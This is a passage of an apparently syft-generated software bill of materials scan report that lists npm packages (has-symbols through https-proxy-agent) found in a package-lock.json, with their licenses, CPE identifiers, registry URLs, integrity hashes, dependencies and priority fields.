tags: + - sbom + - package + raw: + id: fcd80b2c54be3c8f + name: has-symbols + version: 1.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:has-symbols:has-symbols:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:has-symbols:has_symbols:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:has_symbols:has-symbols:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:has_symbols:has_symbols:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:has:has-symbols:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:has:has_symbols:1.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/has-symbols@1.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz + integrity: sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f33597863ab8f3be + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: has-tostringtag 1.0.2' + title: has-tostringtag 1.0.2 + description: 'Package discovered: has-tostringtag 1.0.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 7749e9981a33e1c1 + name: has-tostringtag + version: 1.0.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:has-tostringtag:has-tostringtag:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:has-tostringtag:has_tostringtag:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:has_tostringtag:has-tostringtag:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:has_tostringtag:has_tostringtag:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:has:has-tostringtag:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:has:has_tostringtag:1.0.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/has-tostringtag@1.0.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz + integrity: sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw== + dependencies: + has-symbols: ^1.0.3 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 96e286f1b1295263 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: hasown 2.0.3' + title: hasown 2.0.3 + description: 'Package discovered: hasown 2.0.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 6f96b80a7d603954 + name: hasown + version: 2.0.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:hasown:hasown:2.0.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/hasown@2.0.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/hasown/-/hasown-2.0.3.tgz + integrity: sha512-ej4AhfhfL2Q2zpMmLo7U1Uv9+PyhIZpgQLGT1F9miIGmiCJIoCgSmczFdrc97mWT4kVY72KA+WnnhJ5pghSvSg== + dependencies: + function-bind: ^1.1.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: e883502c6fb5e040 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: helmet 7.2.0' + title: helmet 7.2.0 + description: 'Package discovered: helmet 7.2.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: ad14b3d3d950e009 + name: helmet + version: 7.2.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:helmet:helmet:7.2.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/helmet@7.2.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/helmet/-/helmet-7.2.0.tgz + integrity: sha512-ZRiwvN089JfMXokizgqEPXsl2Guk094yExfoDXR0cBYWxtBbaSww/w+vT4WEJsBW2iTUi1GgZ6swmoug3Oy4Xw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 5ce7a5c301b19471 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: hsl-to-hex 1.0.0' + title: hsl-to-hex 1.0.0 + description: 'Package discovered: hsl-to-hex 1.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 5912401178cdcd30 + name: hsl-to-hex + version: 1.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:hsl-to-hex:hsl-to-hex:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:hsl-to-hex:hsl_to_hex:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:hsl_to_hex:hsl-to-hex:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:hsl_to_hex:hsl_to_hex:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:hsl-to:hsl-to-hex:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:hsl-to:hsl_to_hex:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:hsl_to:hsl-to-hex:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:hsl_to:hsl_to_hex:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:hsl:hsl-to-hex:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:hsl:hsl_to_hex:1.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/hsl-to-hex@1.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/hsl-to-hex/-/hsl-to-hex-1.0.0.tgz + integrity: sha512-K6GVpucS5wFf44X0h2bLVRDsycgJmf9FF2elg+CrqD8GcFU8c6vYhgXn8NjUkFCwj+xDFb70qgLbTUm6sxwPmA== + dependencies: + hsl-to-rgb-for-reals: ^1.1.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 342f7c75e7dae76e + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: hsl-to-rgb-for-reals 1.1.1' + title: hsl-to-rgb-for-reals 1.1.1 + description: 'Package discovered: hsl-to-rgb-for-reals 1.1.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 52590567976abaf8 + name: hsl-to-rgb-for-reals + version: 1.1.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:hsl-to-rgb-for-reals:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:hsl-to-rgb-for-reals:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:hsl_to_rgb_for_reals:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:hsl_to_rgb_for_reals:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:hsl-to-rgb-for:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:hsl-to-rgb-for:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:hsl_to_rgb_for:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:hsl_to_rgb_for:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:hsl-to-rgb:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:hsl-to-rgb:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:hsl_to_rgb:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:hsl_to_rgb:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:hsl-to:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:hsl-to:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:hsl_to:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:hsl_to:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:hsl:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:hsl:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/hsl-to-rgb-for-reals@1.1.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/hsl-to-rgb-for-reals/-/hsl-to-rgb-for-reals-1.1.1.tgz + integrity: sha512-LgOWAkrN0rFaQpfdWBQlv/VhkOxb5AsBjk6NQVx4yEzWS923T07X0M1Y0VNko2H52HeSpZrZNNMJ0aFqsdVzQg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 9e434aef3ca36a26 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: html-entities 2.6.0' + title: html-entities 2.6.0 + description: 'Package discovered: html-entities 2.6.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 4d1e475b46ee4f29 + name: html-entities + version: 2.6.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:html-entities:html-entities:2.6.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:html-entities:html_entities:2.6.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:html_entities:html-entities:2.6.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:html_entities:html_entities:2.6.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:html:html-entities:2.6.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:html:html_entities:2.6.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/html-entities@2.6.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/html-entities/-/html-entities-2.6.0.tgz + integrity: sha512-kig+rMn/QOVRvr7c86gQ8lWXq+Hkv6CbAH1hLu+RG338StTpE8Z0b44SDVaqVu7HGKf27frdmUYEs9hTUX/cLQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 73fec784f0f7a1eb + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: html-to-text 9.0.5' + title: html-to-text 9.0.5 + description: 'Package discovered: html-to-text 9.0.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 41ee91a75a779a86 + name: html-to-text + version: 9.0.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:html-to-text:html-to-text:9.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:html-to-text:html_to_text:9.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:html_to_text:html-to-text:9.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:html_to_text:html_to_text:9.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:html-to:html-to-text:9.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:html-to:html_to_text:9.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:html_to:html-to-text:9.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:html_to:html_to_text:9.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:html:html-to-text:9.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:html:html_to_text:9.0.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/html-to-text@9.0.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/html-to-text/-/html-to-text-9.0.5.tgz + integrity: sha512-qY60FjREgVZL03vJU6IfMV4GDjGBIoOyvuFdpBDIX9yTlDw0TjxVBQp+P8NvpdIXNJvfWBTNul7fsAQJq2FNpg== + dependencies: + '@selderee/plugin-htmlparser2': ^0.11.0 + deepmerge: ^4.3.1 + dom-serializer: ^2.0.0 + htmlparser2: ^8.0.2 + selderee: ^0.11.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: c43d43edb7287d6e + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: htmlparser2 8.0.2' + title: htmlparser2 8.0.2 + description: 'Package discovered: htmlparser2 8.0.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 4a5b4c89e570771b + name: htmlparser2 + version: 8.0.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:htmlparser2:htmlparser2:8.0.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/htmlparser2@8.0.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/htmlparser2/-/htmlparser2-8.0.2.tgz + integrity: sha512-GYdjWKDkbRLkZ5geuHs5NY1puJ+PXwP7+fHPRz06Eirsb9ugf6d8kkXav6ADhcODhFFPMIXyxkxSuMf3D6NCFA== + dependencies: + domelementtype: ^2.3.0 + domhandler: ^5.0.3 + domutils: ^3.0.1 + entities: ^4.4.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f927a519c85962f3 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: http-errors 2.0.1' + title: http-errors 2.0.1 + description: 'Package discovered: http-errors 2.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: bf2c5c4cccddf639 + name: http-errors + version: 2.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:http-errors:http-errors:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:http-errors:http_errors:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:http_errors:http-errors:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:http_errors:http_errors:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:http:http-errors:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:http:http_errors:2.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/http-errors@2.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/http-errors/-/http-errors-2.0.1.tgz + integrity: sha512-4FbRdAX+bSdmo4AUFuS0WNiPz8NgFt+r8ThgNWmlrjQjt1Q7ZR9+zTlce2859x4KSXrwIsaeTqDoKQmtP8pLmQ== + dependencies: + depd: ~2.0.0 + inherits: ~2.0.4 + setprototypeof: ~1.2.0 + statuses: ~2.0.2 + toidentifier: ~1.0.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: af32118f21902d1f + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: http-parser-js 0.5.10' + title: http-parser-js 0.5.10 + description: 'Package discovered: http-parser-js 0.5.10' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: b85e63dfe0c1efe8 + name: http-parser-js + version: 0.5.10 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:http-parser-js:http-parser-js:0.5.10:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:http-parser-js:http_parser_js:0.5.10:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:http_parser_js:http-parser-js:0.5.10:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:http_parser_js:http_parser_js:0.5.10:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:http-parser:http-parser-js:0.5.10:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:http-parser:http_parser_js:0.5.10:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:http_parser:http-parser-js:0.5.10:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:http_parser:http_parser_js:0.5.10:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:http:http-parser-js:0.5.10:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:http:http_parser_js:0.5.10:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/http-parser-js@0.5.10 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/http-parser-js/-/http-parser-js-0.5.10.tgz + integrity: sha512-Pysuw9XpUq5dVc/2SMHpuTY01RFl8fttgcyunjL7eEMhGM3cI4eOmiCycJDVCo/7O7ClfQD3SaI6ftDzqOXYMA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 2fd1314214cea39c + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: http-proxy-agent 5.0.0' + title: http-proxy-agent 5.0.0 + description: 'Package discovered: http-proxy-agent 5.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 91bc09c317f85f97 + name: http-proxy-agent + version: 5.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:http-proxy-agent:http-proxy-agent:5.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:http-proxy-agent:http_proxy_agent:5.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:http_proxy_agent:http-proxy-agent:5.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:http_proxy_agent:http_proxy_agent:5.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:http-proxy:http-proxy-agent:5.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:http-proxy:http_proxy_agent:5.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:http_proxy:http-proxy-agent:5.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:http_proxy:http_proxy_agent:5.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:http:http-proxy-agent:5.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:http:http_proxy_agent:5.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/http-proxy-agent@5.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/http-proxy-agent/-/http-proxy-agent-5.0.0.tgz + integrity: sha512-n2hY8YdoRE1i7r6M0w9DIw5GgZN0G25P8zLCRQ8rjXtTU3vsNFBI/vWK/UIeE6g5MUUz6avwAPXmL6Fy9D/90w== + dependencies: + '@tootallnate/once': '2' + agent-base: '6' + debug: '4' + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d375a13b9232535f + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: https-proxy-agent 5.0.1' + title: https-proxy-agent 5.0.1 + description: 'Package discovered: https-proxy-agent 5.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: ac843d04db23cee1 + name: https-proxy-agent + version: 5.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:https-proxy-agent_project:https-proxy-agent:5.0.1:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/https-proxy-agent@5.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-5.0.1.tgz + integrity: sha512-dFcAjpTQFgoLMzC2VwU+C/CbS7uRL0lWmxDITmqm7C+7F0Odmj6s9l6alZc6AELXhrnggM2CeWSXHGOdX2YtwA== + dependencies: + agent-base: '6' + debug: '4' + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 56bdc5dcaf0f0066 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: https-proxy-agent 7.0.6' + title: https-proxy-agent 7.0.6 + description: 'Package discovered: https-proxy-agent 7.0.6' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 2d10e944bb8687bf 